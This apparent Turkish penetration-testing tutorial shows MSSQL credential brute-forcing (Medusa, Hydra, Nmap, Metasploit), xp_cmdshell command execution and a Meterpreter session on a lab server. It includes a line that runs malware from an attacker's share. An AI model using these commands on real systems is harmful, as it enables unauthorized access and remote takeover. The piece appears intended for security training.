MSSQL Veritabanı Hesabının Tespit Edilmesi ve Meterpreter Bağlantısının Elde Edilmesi

MSSQL veritabanı sızma testlerindeki ilk adımlardan birisi MSSQL yüklü sunucudaki yetkili hesapların kimlik bilgilerini öğrenmektir. Bu yazıda 172.22.71.247 IP adresli makinede yetkili bir hesabın kimlik bilgisi elde edilecek ve bu bilgilerle işletim sistemi üzerinde kd çalıştırılacak ve meterpreter bağlantısı elde edilecektir. Bu işlemler 3 adımda incelenecektir.

1) MSSQL sunucunun IP adresi tespit edilecektir.
2) Veritabanı üzerinde yetkili bir hesabın kimlik bilgileri, farklı araçlarla (hydra aracı, nmap aracı, MSF mssql_login modülü) kaba kuvvet saldırıları ile elde edilecektir.
3) Elde edilen kimlik bilgilerini kullanarak NMAP ms-sql-xp-cmdshell betiği ile işletim sisteminde komut çalıştırılacak ve MSF mssql_payload modülü ile Meterpreter bağlantısı elde edilecektir.

 

1) MSSQL Sunucunun Tespiti

MSSQL sunucusunun Ip adresini tespit etmek için en temel yöntem 1433 portu açık olan bilgisayarları taramaktır:

nmap 172.22.71.0/24 -sS -Pn -n –open -p 1433

Diğer yöntemler sonraki yazılarda incelenecektir.

2) MSSQL Erişim Bilgilerinin Elde Edilmesi

MSSQL veritabanına erişim sağlayabilecek hesaba ait kimlik bilgilerini elde edebilmek için root hesabının masaüstünde “kullanicilar” ve “parolalar” adlı 2 dosya oluşturulmuştur. Bu dosya içerisindeki bilgiler kullanılarak, farklı yöntemlerle MSSQL sunucuya kaba kuvvet saldırısı düzenlenecektir.

 

i) Medusa aracı

Medusa aracını kullanarak kaba kuvvet saldırısı aşağıdaki gibi gerçekleştirilebilir:

medusa -h 172.22.71.247 -U /root/Desktop/kullanicilar -P /root/Desktop/parolalar -O /root/Desktop/medusa_sonuclar -M mssql -n 1433

Tarama sonucu root hesabının masaüstüne medusa_sonuclar olarak kaydedilmiştir:

Tarama sonucundan da görüldüğü gibi, MSSQL veritabanına “test” kullancı adı ve “test” parolası ile giriş yapılabilir.

ii) Hydra aracı

Hydra aracını kullanarak kaba kuvvet saldırısı aşağıdaki gibi gerçekleştirilebilir. Tarama sonucu root hesabının masaüstüne hydra_sonuclar olarak kaydedilmiştir::

hydra mssql://172.22.71.247:1433 -L /root/Desktop/kullanicilar -P /root/Desktop/parolalar -o /root/Desktop/hydra_sonuclar

Tarama sonucundan da görüldüğü gibi, MSSQL veritabanına “test” kullancı adı ve “test” parolası ile giriş yapılabilir.

Not: Hydra aracını diğer araçlara göre en hızlı yöntem olduğu söylenebilir.

iii) Nmap aracı

Nmap aracını kullanarak kaba kuvvet saldırısı aşağıdaki gibi gerçekleştirilebilir. Tarama sonucu root hesabının masaüstüne nmap_sonuclar olarak kaydedilmiştir:

nmap 172.22.71.247 -p1433 –script ms-sql-brute –script-args userdb=/root/Desktop/kullanicilar,passdb=/root/Desktop/parolalar -oN /root/Desktop/hydra_sonuclar

Tarama sonucundan da görüldüğü gibi, MSSQL veritabanına “test” kullancı adı ve “test” parolası ile giriş yapılabilir.

iv) MSF mssql_login modülü

MSF mssql_login auxiliary modülünü kullanarak kaba kuvvet saldırısı gerçekleştirilebilir. Modülün seçenekleri aşağıdaki gibidir:

search mssql_login
use auxiliary/scanner/mssql/mssql_login
show options

Modülün seçenekleri aşağıdaki gibi ayarlanabilir ve modül başlatılabilir:

set RHOSTS 172.22.71.247
set USER_FILE /root/Desktop/kullanicilar
set PASS_FILE /root/Desktop/parolalar
show options
run

Tarama sonucu aşağıdaki gibidir:

Tarama sonucundan da görüldüğü gibi, MSSQL veritabanına “test” kullanıcı adı ve “test” parolası ile giriş yapılabilir.

3) Komut Satırında Komut Çalıştırma ve Meterpreter Bağlantısı Elde Etme

Elde edilen kimlik bilgileri ile (test/test) MSSQL veritabanına giriş için Nmap betikleri ve MSF mssql_payload istismar modülü kullanılabilir.

i) Nmap aracı

Nmap aracını kullanarak işletim sistemi seviyesinde komut çalıştırılması aşağıdaki gibi gerçekleştirilebilir:

nmap 172.22.71.247 -p1433 –script ms-sql-xp-cmdshell –script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd=’whoami && net user’

Yukarıdaki ekran görüntüsünde 2 adet komut (“whoami” ve “net user”) çalıştırılmıştır. Bunun yerine bağlantıdaki mssql_exec modülündeki gibi paylaşımdaki zararlı bir yazılım çalıştırılabilir (start \\172.22.71.5\paylasim$\Zararli1.exe) ve bekleyen multi/handler tarafından bu talep yakalanabilir.

ii) MSF mssql_payload modülü

MSF mssql_payload istismar modülünü kullanarak hedef sisteme Meterpreter ile bağlantı kurulabilir. Modülün seçenekleri aşağıdaki gibidir:

search mssql_payload
use exploit/scanner/mssql/mssql_payload
show options

Modülün seçenekleri aşağıdaki gibi ayarlanabilir ve modül başlatılabilir:

set RHOST 172.22.71.247
set USERNAME test
set PASSWORD test
show options
run

Modül çalıştıktan sonra MSSQLSERVER servisinin yetkileri ile Meterpreter bağlantısının açıldıüı görülmektedir:

getuid
background
sessions

 

Reklamlar

Hakkında Uğur PEK
İşletme ve Teknoloji alanında Yüksek Lisansımı Çukurova Üniversitesinde tamamladım. Microsoft,Oracle,Vmvare,Dell,HP,IBM,NetApp gibi sektörün önde gelen birçok firmasının Workshoplarına, Eventlerına katıldım. Ordu Yardımlaşma Kurumunda IT uzmanı olarak görev yaptım. Şuan Enerji sektörünün önde gelen bir firmasında IT Departmanında İş hayatına devam etmekteyim. İlgi alanlarım Veri Depolama, Backup çözümleri, Vmware Virtualization ve Storage ailesi

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s

%d blogcu bunu beğendi: